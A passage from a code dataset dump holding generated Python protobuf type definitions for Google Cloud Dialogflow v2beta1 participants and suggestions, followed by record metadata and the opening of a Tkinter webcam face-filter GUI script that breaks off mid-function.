message=struct_pb2.Struct,\n )\n\n\nclass SuggestionFeature(proto.Message):\n r\"\"\"The type of Human Agent Assistant API suggestion to perform, and the\n maximum number of results to return for that type. Multiple\n ``Feature`` objects can be specified in the ``features`` list.\n\n Attributes:\n type_ (google.cloud.dialogflow_v2beta1.types.SuggestionFeature.Type):\n Type of Human Agent Assistant API feature to\n request.\n \"\"\"\n\n class Type(proto.Enum):\n r\"\"\"Defines the type of Human Agent Assistant feature.\"\"\"\n TYPE_UNSPECIFIED = 0\n ARTICLE_SUGGESTION = 1\n FAQ = 2\n SMART_REPLY = 3\n\n type_ = proto.Field(proto.ENUM, number=1, enum=Type,)\n\n\nclass AnalyzeContentRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent].\n\n Attributes:\n participant (str):\n Required. The name of the participant this text comes from.\n Format:\n ``projects//locations//conversations//participants/``.\n text_input (google.cloud.dialogflow_v2beta1.types.TextInput):\n The natural language text to be processed.\n event_input (google.cloud.dialogflow_v2beta1.types.EventInput):\n An input event to send to Dialogflow.\n reply_audio_config (google.cloud.dialogflow_v2beta1.types.OutputAudioConfig):\n Speech synthesis configuration.\n The speech synthesis settings for a virtual\n agent that may be configured for the associated\n conversation profile are not used when calling\n AnalyzeContent. If this configuration is not\n supplied, speech synthesis is disabled.\n query_params (google.cloud.dialogflow_v2beta1.types.QueryParameters):\n Parameters for a Dialogflow virtual-agent\n query.\n message_send_time (google.protobuf.timestamp_pb2.Timestamp):\n Optional. The send time of the message from\n end user or human agent's perspective. 
It is\n used for identifying the same message under one\n participant.\n\n Given two messages under the same participant:\n - If send time are different regardless of\n whether the content of the messages are exactly\n the same, the conversation will regard them as\n two distinct messages sent by the participant.\n - If send time is the same regardless of whether\n the content of the messages are exactly the\n same, the conversation will regard them as same\n message, and ignore the message received later.\n If the value is not provided, a new request will\n always be regarded as a new message without any\n de-duplication.\n request_id (str):\n A unique identifier for this request. Restricted to 36 ASCII\n characters. A random UUID is recommended. This request is\n only idempotent if a ``request_id`` is provided.\n \"\"\"\n\n participant = proto.Field(proto.STRING, number=1,)\n text_input = proto.Field(\n proto.MESSAGE, number=6, oneof=\"input\", message=session.TextInput,\n )\n event_input = proto.Field(\n proto.MESSAGE, number=8, oneof=\"input\", message=session.EventInput,\n )\n reply_audio_config = proto.Field(\n proto.MESSAGE, number=5, message=audio_config.OutputAudioConfig,\n )\n query_params = proto.Field(\n proto.MESSAGE, number=9, message=session.QueryParameters,\n )\n message_send_time = proto.Field(\n proto.MESSAGE, number=10, message=timestamp_pb2.Timestamp,\n )\n request_id = proto.Field(proto.STRING, number=11,)\n\n\nclass DtmfParameters(proto.Message):\n r\"\"\"The message in the response that indicates the parameters of\n DTMF.\n\n Attributes:\n accepts_dtmf_input (bool):\n Indicates whether DTMF input can be handled\n in the next request.\n \"\"\"\n\n accepts_dtmf_input = proto.Field(proto.BOOL, number=1,)\n\n\nclass AnalyzeContentResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent].\n\n Attributes:\n reply_text (str):\n Output only. The output text content.\n This field is set if the automated agent\n responded with text to show to the user.\n reply_audio (google.cloud.dialogflow_v2beta1.types.OutputAudio):\n Optional. The audio data bytes encoded as specified in the\n request. This field is set if:\n\n - ``reply_audio_config`` was specified in the request, or\n - The automated agent responded with audio to play to the\n user. In such case, ``reply_audio.config`` contains\n settings used to synthesize the speech.\n\n In some scenarios, multiple output audio fields may be\n present in the response structure. In these cases, only the\n top-most-level audio output has content.\n automated_agent_reply (google.cloud.dialogflow_v2beta1.types.AutomatedAgentReply):\n Optional. Only set if a Dialogflow automated agent has\n responded. Note that:\n [AutomatedAgentReply.detect_intent_response.output_audio][]\n and\n [AutomatedAgentReply.detect_intent_response.output_audio_config][]\n are always empty, use\n [reply_audio][google.cloud.dialogflow.v2beta1.AnalyzeContentResponse.reply_audio]\n instead.\n message (google.cloud.dialogflow_v2beta1.types.Message):\n Output only. Message analyzed by CCAI.\n human_agent_suggestion_results (Sequence[google.cloud.dialogflow_v2beta1.types.SuggestionResult]):\n The suggestions for most recent human agent. 
The order is\n the same as\n [HumanAgentAssistantConfig.SuggestionConfig.feature_configs][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.SuggestionConfig.feature_configs]\n of\n [HumanAgentAssistantConfig.human_agent_suggestion_config][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.human_agent_suggestion_config].\n end_user_suggestion_results (Sequence[google.cloud.dialogflow_v2beta1.types.SuggestionResult]):\n The suggestions for end user. The order is the same as\n [HumanAgentAssistantConfig.SuggestionConfig.feature_configs][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.SuggestionConfig.feature_configs]\n of\n [HumanAgentAssistantConfig.end_user_suggestion_config][google.cloud.dialogflow.v2beta1.HumanAgentAssistantConfig.end_user_suggestion_config].\n dtmf_parameters (google.cloud.dialogflow_v2beta1.types.DtmfParameters):\n Indicates the parameters of DTMF.\n \"\"\"\n\n reply_text = proto.Field(proto.STRING, number=1,)\n reply_audio = proto.Field(proto.MESSAGE, number=2, message=\"OutputAudio\",)\n automated_agent_reply = proto.Field(\n proto.MESSAGE, number=3, message=\"AutomatedAgentReply\",\n )\n message = proto.Field(proto.MESSAGE, number=5, message=\"Message\",)\n human_agent_suggestion_results = proto.RepeatedField(\n proto.MESSAGE, number=6, message=\"SuggestionResult\",\n )\n end_user_suggestion_results = proto.RepeatedField(\n proto.MESSAGE, number=7, message=\"SuggestionResult\",\n )\n dtmf_parameters = proto.Field(proto.MESSAGE, number=9, message=\"DtmfParameters\",)\n\n\nclass AnnotatedMessagePart(proto.Message):\n r\"\"\"Represents a part of a message possibly annotated with an\n entity. The part can be an entity or purely a part of the\n message between two entities or message start/end.\n\n Attributes:\n text (str):\n Required. A part of a message possibly\n annotated with an entity.\n entity_type (str):\n Optional. The `Dialogflow system entity\n type `__\n of this message part. If this is empty, Dialogflow could not\n annotate the phrase part with a system entity.\n formatted_value (google.protobuf.struct_pb2.Value):\n Optional. The `Dialogflow system entity formatted\n value `__\n of this message part. For example for a system entity of\n type ``@sys.unit-currency``, this may contain:\n\n .. raw:: html\n\n
<pre>\n                {\n                  \"amount\": 5,\n                  \"currency\": \"USD\"\n                }\n                </pre>
        \n \"\"\"\n\n text = proto.Field(proto.STRING, number=1,)\n entity_type = proto.Field(proto.STRING, number=2,)\n formatted_value = proto.Field(proto.MESSAGE, number=3, message=struct_pb2.Value,)\n\n\nclass MessageAnnotation(proto.Message):\n r\"\"\"Represents the result of annotation for the message.\n Attributes:\n parts (Sequence[google.cloud.dialogflow_v2beta1.types.AnnotatedMessagePart]):\n Optional. The collection of annotated message parts ordered\n by their position in the message. You can recover the\n annotated message by concatenating\n [AnnotatedMessagePart.text].\n contain_entities (bool):\n Required. Indicates whether the text message\n contains entities.\n \"\"\"\n\n parts = proto.RepeatedField(\n proto.MESSAGE, number=1, message=\"AnnotatedMessagePart\",\n )\n contain_entities = proto.Field(proto.BOOL, number=2,)\n\n\nclass ArticleAnswer(proto.Message):\n r\"\"\"Represents article answer.\n Attributes:\n title (str):\n The article title.\n uri (str):\n The article URI.\n snippets (Sequence[str]):\n Output only. Article snippets.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.ArticleAnswer.MetadataEntry]):\n A map that contains metadata about the answer\n and the document from which it originates.\n answer_record (str):\n The name of answer record, in the format of\n \"projects//locations//answerRecords/\".\n \"\"\"\n\n title = proto.Field(proto.STRING, number=1,)\n uri = proto.Field(proto.STRING, number=2,)\n snippets = proto.RepeatedField(proto.STRING, number=3,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n\nclass FaqAnswer(proto.Message):\n r\"\"\"Represents answer from \"frequently asked questions\".\n Attributes:\n answer (str):\n The piece of text from the ``source`` knowledge base\n document.\n confidence (float):\n The system's confidence score that this\n Knowledge answer is a good match for this\n conversational query, range from 0.0 (completely\n uncertain) to 1.0 (completely certain).\n question (str):\n The corresponding FAQ question.\n source (str):\n Indicates which Knowledge Document this answer was extracted\n from. 
Format:\n ``projects//locations//agent/knowledgeBases//documents/``.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.FaqAnswer.MetadataEntry]):\n A map that contains metadata about the answer\n and the document from which it originates.\n answer_record (str):\n The name of answer record, in the format of\n \"projects//locations//answerRecords/\".\n \"\"\"\n\n answer = proto.Field(proto.STRING, number=1,)\n confidence = proto.Field(proto.FLOAT, number=2,)\n question = proto.Field(proto.STRING, number=3,)\n source = proto.Field(proto.STRING, number=4,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n\nclass SmartReplyAnswer(proto.Message):\n r\"\"\"Represents a smart reply answer.\n Attributes:\n reply (str):\n The content of the reply.\n confidence (float):\n Smart reply confidence.\n The system's confidence score that this reply is\n a good match for this conversation, as a value\n from 0.0 (completely uncertain) to 1.0\n (completely certain).\n answer_record (str):\n The name of answer record, in the format of\n \"projects//locations//answerRecords/\".\n \"\"\"\n\n reply = proto.Field(proto.STRING, number=1,)\n confidence = proto.Field(proto.FLOAT, number=2,)\n answer_record = proto.Field(proto.STRING, number=3,)\n\n\nclass SuggestionResult(proto.Message):\n r\"\"\"One response of different type of suggestion response which is used\n in the response of\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent]\n and\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent],\n as well as\n [HumanAgentAssistantEvent][google.cloud.dialogflow.v2beta1.HumanAgentAssistantEvent].\n\n Attributes:\n error (google.rpc.status_pb2.Status):\n Error status if the request failed.\n suggest_articles_response (google.cloud.dialogflow_v2beta1.types.SuggestArticlesResponse):\n SuggestArticlesResponse if request is for\n ARTICLE_SUGGESTION.\n suggest_faq_answers_response (google.cloud.dialogflow_v2beta1.types.SuggestFaqAnswersResponse):\n SuggestFaqAnswersResponse if request is for FAQ_ANSWER.\n suggest_smart_replies_response (google.cloud.dialogflow_v2beta1.types.SuggestSmartRepliesResponse):\n SuggestSmartRepliesResponse if request is for SMART_REPLY.\n \"\"\"\n\n error = proto.Field(\n proto.MESSAGE, number=1, oneof=\"suggestion_response\", message=status_pb2.Status,\n )\n suggest_articles_response = proto.Field(\n proto.MESSAGE,\n number=2,\n oneof=\"suggestion_response\",\n message=\"SuggestArticlesResponse\",\n )\n suggest_faq_answers_response = proto.Field(\n proto.MESSAGE,\n number=3,\n oneof=\"suggestion_response\",\n message=\"SuggestFaqAnswersResponse\",\n )\n suggest_smart_replies_response = proto.Field(\n proto.MESSAGE,\n number=4,\n oneof=\"suggestion_response\",\n message=\"SuggestSmartRepliesResponse\",\n )\n\n\nclass SuggestArticlesRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestArticles][google.cloud.dialogflow.v2beta1.Participants.SuggestArticles].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n latest_message (str):\n Optional. The name of the latest conversation message to\n compile suggestion for. If empty, it will be the latest\n message of the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. 
Max number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestArticlesRequest.latest_message]\n to use as context when compiling the suggestion. By default\n 20 and at most 50.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestArticlesResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.SuggestArticles][google.cloud.dialogflow.v2beta1.Participants.SuggestArticles].\n\n Attributes:\n article_answers (Sequence[google.cloud.dialogflow_v2beta1.types.ArticleAnswer]):\n Output only. Articles ordered by score in\n descending order.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestArticlesResponse.latest_message]\n to compile the suggestion. It may be smaller than the\n [SuggestArticlesResponse.context_size][google.cloud.dialogflow.v2beta1.SuggestArticlesResponse.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n article_answers = proto.RepeatedField(\n proto.MESSAGE, number=1, message=\"ArticleAnswer\",\n )\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestFaqAnswersRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestFaqAnswers][google.cloud.dialogflow.v2beta1.Participants.SuggestFaqAnswers].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n latest_message (str):\n Optional. The name of the latest conversation message to\n compile suggestion for. If empty, it will be the latest\n message of the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. Max number of messages prior to and including\n [latest_message] to use as context when compiling the\n suggestion. By default 20 and at most 50.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestFaqAnswersResponse(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestFaqAnswers][google.cloud.dialogflow.v2beta1.Participants.SuggestFaqAnswers].\n\n Attributes:\n faq_answers (Sequence[google.cloud.dialogflow_v2beta1.types.FaqAnswer]):\n Output only. Answers extracted from FAQ\n documents.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestFaqAnswersResponse.latest_message]\n to compile the suggestion. 
It may be smaller than the\n [SuggestFaqAnswersRequest.context_size][google.cloud.dialogflow.v2beta1.SuggestFaqAnswersRequest.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n faq_answers = proto.RepeatedField(proto.MESSAGE, number=1, message=\"FaqAnswer\",)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestSmartRepliesRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestSmartReplies][google.cloud.dialogflow.v2beta1.Participants.SuggestSmartReplies].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n current_text_input (google.cloud.dialogflow_v2beta1.types.TextInput):\n The current natural language text segment to\n compile suggestion for. This provides a way for\n user to get follow up smart reply suggestion\n after a smart reply selection, without sending a\n text message.\n latest_message (str):\n The name of the latest conversation message to compile\n suggestion for. If empty, it will be the latest message of\n the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. Max number of messages prior to and including\n [latest_message] to use as context when compiling the\n suggestion. By default 20 and at most 50.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n current_text_input = proto.Field(\n proto.MESSAGE, number=4, message=session.TextInput,\n )\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestSmartRepliesResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.SuggestSmartReplies][google.cloud.dialogflow.v2beta1.Participants.SuggestSmartReplies].\n\n Attributes:\n smart_reply_answers (Sequence[google.cloud.dialogflow_v2beta1.types.SmartReplyAnswer]):\n Output only. Multiple reply options provided\n by smart reply service. The order is based on\n the rank of the model prediction. The maximum\n number of the returned replies is set in\n SmartReplyConfig.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestSmartRepliesResponse.latest_message]\n to compile the suggestion. It may be smaller than the\n [SuggestSmartRepliesRequest.context_size][google.cloud.dialogflow.v2beta1.SuggestSmartRepliesRequest.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n smart_reply_answers = proto.RepeatedField(\n proto.MESSAGE, number=1, message=\"SmartReplyAnswer\",\n )\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass Suggestion(proto.Message):\n r\"\"\"Represents a suggestion for a human agent.\n Attributes:\n name (str):\n Output only. The name of this suggestion. Format:\n ``projects//locations//conversations//participants/*/suggestions/``.\n articles (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.Article]):\n Output only. Articles ordered by score in\n descending order.\n faq_answers (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.FaqAnswer]):\n Output only. 
Answers extracted from FAQ\n documents.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The time the suggestion was\n created.\n latest_message (str):\n Output only. Latest message used as context to compile this\n suggestion.\n\n Format:\n ``projects//locations//conversations//messages/``.\n \"\"\"\n\n class Article(proto.Message):\n r\"\"\"Represents suggested article.\n Attributes:\n title (str):\n Output only. The article title.\n uri (str):\n Output only. The article URI.\n snippets (Sequence[str]):\n Output only. Article snippets.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.Article.MetadataEntry]):\n Output only. A map that contains metadata\n about the answer and the document from which it\n originates.\n answer_record (str):\n Output only. The name of answer record, in\n the format of \"projects//locations//answerRecords/\".\n \"\"\"\n\n title = proto.Field(proto.STRING, number=1,)\n uri = proto.Field(proto.STRING, number=2,)\n snippets = proto.RepeatedField(proto.STRING, number=3,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n class FaqAnswer(proto.Message):\n r\"\"\"Represents suggested answer from \"frequently asked\n questions\".\n\n Attributes:\n answer (str):\n Output only. The piece of text from the ``source`` knowledge\n base document.\n confidence (float):\n The system's confidence score that this\n Knowledge answer is a good match for this\n conversational query, range from 0.0 (completely\n uncertain) to 1.0 (completely certain).\n question (str):\n Output only. The corresponding FAQ question.\n source (str):\n Output only. Indicates which Knowledge Document this answer\n was extracted from. Format:\n ``projects//locations//agent/knowledgeBases//documents/``.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.FaqAnswer.MetadataEntry]):\n Output only. A map that contains metadata\n about the answer and the document from which it\n originates.\n answer_record (str):\n Output only. The name of answer record, in\n the format of \"projects//locations//answerRecords/\".\n \"\"\"\n\n answer = proto.Field(proto.STRING, number=1,)\n confidence = proto.Field(proto.FLOAT, number=2,)\n question = proto.Field(proto.STRING, number=3,)\n source = proto.Field(proto.STRING, number=4,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n name = proto.Field(proto.STRING, number=1,)\n articles = proto.RepeatedField(proto.MESSAGE, number=2, message=Article,)\n faq_answers = proto.RepeatedField(proto.MESSAGE, number=4, message=FaqAnswer,)\n create_time = proto.Field(proto.MESSAGE, number=5, message=timestamp_pb2.Timestamp,)\n latest_message = proto.Field(proto.STRING, number=7,)\n\n\nclass ListSuggestionsRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.ListSuggestions][google.cloud.dialogflow.v2beta1.Participants.ListSuggestions].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestions\n for. Format:\n ``projects//locations//conversations//participants/``.\n page_size (int):\n Optional. The maximum number of items to\n return in a single page. The default value is\n 100; the maximum value is 1000.\n page_token (str):\n Optional. The next_page_token value returned from a previous\n list request.\n filter (str):\n Optional. Filter on suggestions fields. 
Currently predicates\n on ``create_time`` and ``create_time_epoch_microseconds``\n are supported. ``create_time`` only support milliseconds\n accuracy. E.g.,\n ``create_time_epoch_microseconds > 1551790877964485`` or\n ``create_time > \"2017-01-15T01:30:15.01Z\"``\n\n For more information about filtering, see `API\n Filtering `__.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n page_size = proto.Field(proto.INT32, number=2,)\n page_token = proto.Field(proto.STRING, number=3,)\n filter = proto.Field(proto.STRING, number=4,)\n\n\nclass ListSuggestionsResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.ListSuggestions][google.cloud.dialogflow.v2beta1.Participants.ListSuggestions].\n\n Attributes:\n suggestions (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion]):\n Required. The list of suggestions. There will be a maximum\n number of items returned based on the page_size field in the\n request. ``suggestions`` is sorted by ``create_time`` in\n descending order.\n next_page_token (str):\n Optional. Token to retrieve the next page of\n results or empty if there are no more results in\n the list.\n \"\"\"\n\n @property\n def raw_page(self):\n return self\n\n suggestions = proto.RepeatedField(proto.MESSAGE, number=1, message=\"Suggestion\",)\n next_page_token = proto.Field(proto.STRING, number=2,)\n\n\nclass CompileSuggestionRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.CompileSuggestion][google.cloud.dialogflow.v2beta1.Participants.CompileSuggestion].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n latest_message (str):\n Optional. The name of the latest conversation message to\n compile suggestion for. If empty, it will be the latest\n message of the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. Max number of messages prior to and including\n [latest_message] to use as context when compiling the\n suggestion. If zero or less than zero, 20 is used.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass CompileSuggestionResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.CompileSuggestion][google.cloud.dialogflow.v2beta1.Participants.CompileSuggestion].\n\n Attributes:\n suggestion (google.cloud.dialogflow_v2beta1.types.Suggestion):\n The compiled suggestion.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.CompileSuggestionResponse.latest_message]\n to compile the suggestion. 
It may be smaller than the\n [CompileSuggestionRequest.context_size][google.cloud.dialogflow.v2beta1.CompileSuggestionRequest.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n suggestion = proto.Field(proto.MESSAGE, number=1, message=\"Suggestion\",)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass ResponseMessage(proto.Message):\n r\"\"\"Response messages from an automated agent.\n Attributes:\n text (google.cloud.dialogflow_v2beta1.types.ResponseMessage.Text):\n Returns a text response.\n payload (google.protobuf.struct_pb2.Struct):\n Returns a response containing a custom,\n platform-specific payload.\n live_agent_handoff (google.cloud.dialogflow_v2beta1.types.ResponseMessage.LiveAgentHandoff):\n Hands off conversation to a live agent.\n end_interaction (google.cloud.dialogflow_v2beta1.types.ResponseMessage.EndInteraction):\n A signal that indicates the interaction with\n the Dialogflow agent has ended.\n \"\"\"\n\n class Text(proto.Message):\n r\"\"\"The text response message.\n Attributes:\n text (Sequence[str]):\n A collection of text responses.\n \"\"\"\n\n text = proto.RepeatedField(proto.STRING, number=1,)\n\n class LiveAgentHandoff(proto.Message):\n r\"\"\"Indicates that the conversation should be handed off to a human\n agent.\n\n Dialogflow only uses this to determine which conversations were\n handed off to a human agent for measurement purposes. What else to\n do with this signal is up to you and your handoff procedures.\n\n You may set this, for example:\n\n - In the entry fulfillment of a CX Page if entering the page\n indicates something went extremely wrong in the conversation.\n - In a webhook response when you determine that the customer issue\n can only be handled by a human.\n\n Attributes:\n metadata (google.protobuf.struct_pb2.Struct):\n Custom metadata for your handoff procedure.\n Dialogflow doesn't impose any structure on this.\n \"\"\"\n\n metadata = proto.Field(proto.MESSAGE, number=1, message=struct_pb2.Struct,)\n\n class EndInteraction(proto.Message):\n r\"\"\"Indicates that interaction with the Dialogflow agent has\n ended.\n \"\"\"\n\n text = proto.Field(proto.MESSAGE, number=1, oneof=\"message\", message=Text,)\n payload = proto.Field(\n proto.MESSAGE, number=2, oneof=\"message\", message=struct_pb2.Struct,\n )\n live_agent_handoff = proto.Field(\n proto.MESSAGE, number=3, oneof=\"message\", message=LiveAgentHandoff,\n )\n end_interaction = proto.Field(\n proto.MESSAGE, number=4, oneof=\"message\", message=EndInteraction,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/cloud/dialogflow_v2beta1/types/participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":47254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459102091","text":"from tkinter import *\nimport cv2\nimport threading\nimport datetime\nimport os\nimport time\nfrom PIL import Image, ImageTk\nfrom FaceFilters import FaceFilters\n\nclass GUIFace:\n\tdef __init__(self, vs, fc, outPath):\n\t\tself.vs = vs\n\t\tself.fc = fc\n\t\tself.outPath = outPath\n\t\tself.frame = None\n\t\tself.thread = None\n\t\tself.stopEvent = None\n\t\tself.filterChoice = None\n\t\t# initialize the root window and video panel\n\t\tself.root = Tk()\n\t\tself.panel = None\n\n\n\t\tself.center = Frame(self.root, width=150, height=40,padx=10, pady=10)\n\t\tbtm_frame = Frame(self.root, 
bg='white', width=450, height=45, padx=3, pady=3)\n\t\tbtm_frame2 = Frame(self.root, bg='white', width=450, height=60)\n\n\t\t# layout all of the main containers\n\t\tself.root.grid_rowconfigure(1, weight=1)\n\t\tself.root.grid_columnconfigure(0, weight=1)\n\n\t\tself.center.grid(row=1)\n\t\tbtm_frame.grid(row=3)\n\t\tbtm_frame2.grid(row=4)\n\n\n\t\t# create the center widgets\n\t\tself.center.grid_rowconfigure(1, weight=1)\n\t\tself.center.grid_columnconfigure(1, weight=1)\n\n\t\t#panel = Frame(center, bg='yellow', width=250, height=210, padx=3, pady=3)\n\t\t#ctr_mid.grid(row=0, column=1, sticky=\"nsew\")\n\n\t\t# create the bottom widgets\n\t\tbtn1 = Button(btm_frame, text='Glasses', command=lambda: self.setFilterChoice(0), width = 20, fg = \"black\", bg = \"pink\", bd = 0)\n\t\tbtn2 = Button(btm_frame, text='Sunglasses1', command=lambda: self.setFilterChoice(1), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\t\tbtn3 = Button(btm_frame, text='Sunglasses2', command=lambda: self.setFilterChoice(2), width = 20, fg = \"black\", bg = \"aquamarine\", bd = 0)\n\t\tbtn4 = Button(btm_frame, text='Sunglasses3', command=lambda: self.setFilterChoice(3), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\t\tbtn5 = Button(btm_frame, text='Dog', command=lambda: self.setFilterChoice(4), width = 20, fg = \"black\", bg = \"pink\", bd = 0)\n\t\tbtn6 = Button(btm_frame, text='Rabbit', command=lambda: self.setFilterChoice(5), width = 20,fg = \"black\", bg = \"aquamarine\", bd = 0)\n\t\tbtn7 = Button(btm_frame, text='Moustache1', command=lambda: self.setFilterChoice(6), width = 20, fg = \"black\", bg = \"pink\", bd = 0)\n\t\tbtn8 = Button(btm_frame, text='Moustache2', command=lambda: self.setFilterChoice(7), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\t\tbtn9 = Button(btm_frame, text='Ironman', command=lambda: self.setFilterChoice(8), width = 20, fg = \"black\", bg = \"aquamarine\", bd = 0)\n\t\tbtn10 = Button(btm_frame, text='Captain America', command=lambda: self.setFilterChoice(9), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\n\t\t# layout the widgets in bottom frame\n\t\tbtn1.grid(row=0, column=1)\n\t\tbtn2.grid(row=0, column=2)\n\t\tbtn3.grid(row=0, column=3)\n\t\tbtn4.grid(row=0, column=4)\n\t\tbtn5.grid(row=0, column=5)\n\t\tbtn6.grid(row=1, column=1)\n\t\tbtn7.grid(row=1, column=2)\n\t\tbtn8.grid(row=1, column=3)\n\t\tbtn9.grid(row=1, column=4)\n\t\tbtn10.grid(row=1, column=5)\n\n\t\t# create the bottom2 widgets\n\t\tbtm_frame2.grid_columnconfigure(1, weight=1)\n\t\tsnapbtn = Button(btm_frame2, text='Snap!', command=self.takeSnapshot, width = 80, height=2, fg = \"black\", bg = \"lime green\", bd = 1)\n\t\tsnapbtn.grid(row=0, column=0,columnspan=3)\n\n\t\t# start polling the video sensor for the most recently read frame\n\t\tself.stopEvent = threading.Event()\n\t\tself.videoLoop()\n\n\t\t#self.root.geometry('800x610')\n\t\tself.root.wm_title('Face Filters')\n\t\tself.root.wm_protocol('WM_DELETE_WINDOW', self.onClose)\n\t\tself.root.mainloop()\n\t\n\tdef videoLoop(self):\n\t\ttry:\n\n\t\t\tif not self.stopEvent.is_set():\n\t\t\t\t# keep looping over frames until instructed to stop\n\t\t\t\tself.frame = self.vs.read()\n\t\t\t\tif self.filterChoice is not None:\n\t\t\t\t\tself.frame = self.fc.applyFilter(self.frame, self.filterChoice)\n\t\t\t\tself.frame = cv2.flip(self.frame, 1)\n\t\t\t\tcv2image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGBA)\n\t\t\t\timg = Image.fromarray(cv2image)\n\t\t\t\timg = ImageTk.PhotoImage(image=img)\n\n\t\t\t\t# if 
